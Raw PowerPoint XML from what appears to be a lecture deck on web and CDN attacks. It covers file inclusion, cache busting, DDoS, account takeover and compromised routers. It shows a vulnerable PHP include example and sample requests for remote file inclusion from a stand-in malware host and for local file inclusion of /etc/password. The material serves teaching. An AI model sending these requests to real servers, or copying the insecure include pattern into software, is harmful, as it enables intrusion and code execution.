              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( $_GET['COLOR'] ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>     include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>( $_GET['COLOR'] . '.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="7092950"/>
            <a:ext cx="3911648"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(Example from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868818" y="1258728"/>
            <a:ext cx="13976968"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A script on the server called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custom_color.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> chooses which file to include based on color:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868818" y="4821078"/>
            <a:ext cx="8502649"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Attacker sets color to something other than red or blue!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="868818" y="5337810"/>
            <a:ext cx="13167360" cy="1659890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130609" tIns="65305" rIns="130609" bIns="65305" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="902471"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08" indent="-174608"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403618" indent="170064" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="818575" indent="158725" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1147364" indent="242624" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="573683" indent="-170064"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01" indent="-158725"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89989" indent="-167796" algn="l" defTabSz="902471"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0882" indent="-326522" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buChar char="•"/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=http://exploits.com/malware39</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>initialize_database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>custom_color.php?COLOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>/password%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8770557" y="3373278"/>
            <a:ext cx="3985386" cy="1940243"/>
            <a:chOff x="8770557" y="3373278"/>
            <a:chExt cx="3985386" cy="1940243"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="9867900" y="3962400"/>
              <a:ext cx="895350" cy="135112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TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8770557" y="3373278"/>
              <a:ext cx="3985386" cy="492443"/>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remote file inclusion (RFI)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10315575" y="6105148"/>
            <a:ext cx="3972157" cy="892552"/>
            <a:chOff x="10315575" y="6105148"/>
            <a:chExt cx="3972157" cy="892552"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11506201" y="6105148"/>
              <a:ext cx="2781531" cy="892552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>local file inclusion</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(LFI)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="10934700" y="6582727"/>
              <a:ext cx="571501"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Right Brace 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10315575" y="6167755"/>
              <a:ext cx="447675" cy="829945"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrac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797612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Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker adds query strings to the end of a requested URL, e.g.,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://ak.xyz.com/manual.pdf?id=832164328</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3194710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7ACA-19F4-41D8-90E7-A17BFAACE104}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious login attempts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D431F1E2-93BD-4007-B341-2835023867D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B4AB64C-B6C0-44FD-B242-DE6ABAF633F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="35503" t="46932" r="27952" b="11887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731520" y="1554480"/>
            <a:ext cx="8641080" cy="5233908"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3404625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t>Largest DDOS Attacks by Year</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2170888" y="3860886"/>
            <a:ext cx="1011815" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gbps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9484CC57-2522-4E72-9E7F-8A94BC449EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249936" y="4655656"/>
            <a:ext cx="1229824" cy="572464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3120" dirty="0"/>
              <a:t>Krebs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1C97C0-3F63-45A7-A660-45B8C13C431A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10265973" y="2329558"/>
            <a:ext cx="1428596" cy="572464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3120" dirty="0"/>
              <a:t>GitHub</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Chart 7">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418278958"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3749040" y="2194560"/>
          <a:ext cx="7475220" cy="53225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955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Bot-Based Account Takeover: Obtain Password Dump</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994190" y="1645920"/>
            <a:ext cx="6642021" cy="5852160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4147842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 Compromised Home Cable Modems/Routers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="619598" y="1983484"/>
            <a:ext cx="5740229" cy="5348488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728441" y="2594641"/>
            <a:ext cx="7568152" cy="4126170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3291335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Takeover Campaign Attack Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Content Placeholder 15"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="811041" y="1112846"/>
            <a:ext cx="8903921" cy="6447535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2310994" y="2314979"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2800624" y="3560758"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2282478" y="5705329"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7413616" y="2127284"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6625986" y="3560758"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7455042" y="5707203"/>
            <a:ext cx="1244727" cy="591927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4721234" y="2127284"/>
            <a:ext cx="921232" cy="860622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4721233" y="6561271"/>
            <a:ext cx="921232" cy="860622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
